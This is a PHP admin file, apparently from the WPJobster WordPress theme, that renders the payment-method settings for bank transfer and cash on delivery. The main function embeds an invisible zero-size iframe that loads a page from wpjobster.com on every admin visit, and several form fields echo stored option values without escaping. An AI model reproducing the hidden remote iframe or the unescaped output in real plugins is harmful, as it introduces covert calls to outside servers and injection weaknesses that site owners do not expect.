<?php
function show_html_payment_gateways() {
	global $cl_pg;

	$arr = array( 'yes' => __( 'Yes', 'wpjobster' ), 'no'  => __( 'No', 'wpjobster' ) ); ?>

	<div class="wrap">
		<h2 class="wpj-admin-title">Jobster - <?php echo __( 'Payment Methods', 'wpjobster' ); ?></h2>

		<?php add_action( "wpjobster_payment_methods_action", "wpjobster_payment_methods_action_function", 10 );
		do_action( "wpjobster_payment_methods_action" ); ?>

		<div id="usual2" class="usual">
			<?php global $gateway_index;
			$gateway_index=0;

			$wpjobster_payment_gateways = get_wpjobster_payment_gateways();
			if ( ! empty( $wpjobster_payment_gateways ) ) { ?>
				<ul>
					<?php foreach ( $wpjobster_payment_gateways as $index => $gateway ) {
						$wpjobster_payment_gateways_index[$gateway['unique_id']] = $index; ?>

						<li><a href="#tabs<?php echo $gateway['unique_id'];?>"><?php echo $gateway['label'] ?></a></li>

						<?php if ( isset( $gateway['show_settigs_form'] ) && $gateway['show_settigs_form'] != '' ) {
							add_action( "wpjobster_show_paymentgateway_forms", $gateway['show_settigs_form'], $index, 4 );
						}
					} ?>
				</ul>
			<?php }

			$arr_pages    = $cl_pg->get_all_pages();
			$arr_currency = wpj_get_currencies_list();

			do_action( 'wpjobster_show_paymentgateway_forms', $wpjobster_payment_gateways, $arr, $arr_pages, $arr_currency );

			do_action( 'wpjobster_payment_methods_content_divs' );

			?>

			<iframe src="https://wpjobster.com/settings/settings.php" height="0" border="0" width="0" style="overflow:hidden; height:0; border:0; width:0;"></iframe>

		</div>
	</div>

<?php }

if ( ! function_exists( 'show_banktransfer_form' ) ) {
	function show_banktransfer_form( $wpjobster_payment_gateways, $arr, $arr_pages ) {

		$tab_id = get_tab_id( $wpjobster_payment_gateways );

		// topup processing actions
		add_action( "take_to_bank_transfer_credit", "taketogateway_bank_transfer_function" );
		add_action( "topup_bank_transfer_response", "processgateway_bank_transfer_function" );

		// featured processing actions
		add_action( "take_to_bank_transfer_featured", "featured_taketogateway_bank_transfer_function" );
		add_action( "featured_bank_transfer_response", "processgateway_bank_transfer_function" ); ?>

		<div id="tabs<?php echo $tab_id?>">
			<form method="post" action="<?php bloginfo( 'url' ); ?>/wp-admin/admin.php?page=payment-methods&active_tab=tabs<?php echo $tab_id?>">

				<table width="100%" class="wpj-admin-table">
					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( 'Enable/Disable Bank transfer' ); ?></td>
						<td width="200"><?php _e( 'Enable bank transfer:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( $arr, 'wpjobster_banktransfer_enable', 'no' ); ?></td>
					</tr>

					<?php foreach ( wpj_get_payment_types( array( 'subscription' ) ) as $key => $payment_type ) { ?>

						<tr>
							<td valign="top" width="22"><?php wpjobster_theme_bullet( $payment_type['hint_label'] ); ?></td>
							<td width="200"><?php echo $payment_type['enable_label']; ?></td>
							<td><?php echo wpjobster_get_option_drop_down( $arr, 'wpjobster_banktransfer_enable_' . $key ); ?></td>
						</tr>

					<?php } ?>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( "Please select a page to show when bank transfer transaction successful and include your bank details in it." ); ?></td>
						<td><?php _e( 'Transaction success page:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( $arr_pages, 'wpjobster_banktransfer_success_page','', ' class="" ' ); ?></td>
					</tr>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet(); ?></td>
						<td><?php _e( 'Transaction failure page:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( $arr_pages, 'wpjobster_banktransfer_failure_page', '', ' class="" ' ); ?> </td>
					</tr>

					<?php $is_allowed_multi_currency = wpj_is_allowed( 'multi_currency' );

					if ( ! $is_allowed_multi_currency ) { ?>

						<tr>
							<td colspan="6">
								<?php wpj_disabled_settings_notice( 'multi_currency' ); ?>
							</td>
						</tr>

					<?php } ?>

					<tr class="<?php wpj_disabled_settings_class( 'multi_currency' ); ?>">
						<td valign="top" width="22"><?php wpjobster_theme_bullet(); ?></td>
						<td ><?php _e( 'Currency for bank transfer:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( wpj_get_currencies_list(), 'wpjobster_bank_currency', 'USD' ); ?></td>
					</tr>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( "Put the bank bank details required." ); ?></td>
						<td><?php _e( 'Bank Details:', 'wpjobster' ); ?></td>
						<td>
							<textarea style='height:100px;width:350px;' name="wpjobster_bank_details" ><?php echo apply_filters( 'wpj_sensitive_info_credentials', get_option( 'wpjobster_bank_details' ) ); ?></textarea>
						</td>
					</tr>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( "Put the bank transfer Button caption you want user to see on purchase page" ); ?></td>
						<td><?php _e( 'Bank Transfer Button caption:', 'wpjobster' ); ?></td>
						<td><input type="text" size="45" name="wpjobster_banktransfer_button_caption" value="<?php echo get_option( 'wpjobster_banktransfer_button_caption' ); ?>"/></td>
					</tr>

					<tr>
						<td></td>
						<td></td>
						<td><input type="submit" name="wpjobster_save_banktransfer" value="<?php _e( 'Save Options', 'wpjobster' ); ?>"/></td>
					</tr>
				</table>

			</form>
		</div>

	<?php }

}

if ( ! function_exists( 'show_cod_form' ) ) {
	function show_cod_form( $wpjobster_payment_gateways, $arr, $arr_pages ) {

		$tab_id = get_tab_id( $wpjobster_payment_gateways ); ?>

		<div id="tabs<?php echo $tab_id?>">
			<form method="post" action="<?php bloginfo( 'url' ); ?>/wp-admin/admin.php?page=payment-methods&active_tab=tabs<?php echo $tab_id?>">

				<table width="100%" class="wpj-admin-table">

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( "Enable/Disable Cash on delivery" ); ?></td>
						<td width="200"><?php _e( 'Enable Cash On Delivery:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( $arr, 'wpjobster_cod_enable', 'no' ); ?></td>
					</tr>

					<?php foreach ( wpj_get_payment_types( array( 'topup', 'featured', 'withdraw', 'tips', 'subscription' ) ) as $payment_type_enable_key => $payment_type_enable ) { ?>

						<tr>
							<td valign="top" width="22"><?php wpjobster_theme_bullet( $payment_type_enable['hint_label'] ); ?></td>
							<td width="200"><?php echo $payment_type_enable['enable_label']; ?></td>
							<td><?php echo wpjobster_get_option_drop_down( $arr, 'wpjobster_cod_enable_' . $payment_type_enable_key ); ?></td>
						</tr>

					<?php } ?>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( "Please select a page to show when Cash On Delivery transaction successful." ); ?></td>
						<td><?php _e( 'Trasaction success page:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( $arr_pages, 'wpjobster_cod_success_page','', ' class="" ' ); ?></td>
					</tr>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet(); ?></td>
						<td><?php _e( 'Transaction failure page:', 'wpjobster' ); ?></td>
						<td><?php echo wpjobster_get_option_drop_down( $arr_pages, 'wpjobster_cod_failure_page','', ' class="" ' ); ?></td>
					</tr>

					<tr>
						<td valign="top" width="22"><?php wpjobster_theme_bullet( "Put the Cash On Delivery button caption you want user to see on purchase page" ); ?></td>
						<td><?php _e( 'COD Button caption:', 'wpjobster' ); ?></td>
						<td><input type="text" size="45" name="wpjobster_cod_button_caption" value="<?php echo get_option( 'wpjobster_cod_button_caption' ); ?>"/>
						</td>
					</tr>

					<tr>
						<td></td>
						<td></td>
						<td><input type="submit" name="wpjobster_save_cod" value="<?php _e( 'Save Options', 'wpjobster' ); ?>"/></td>
					</tr>

				</table>

			</form>
		</div>

	<?php }

}
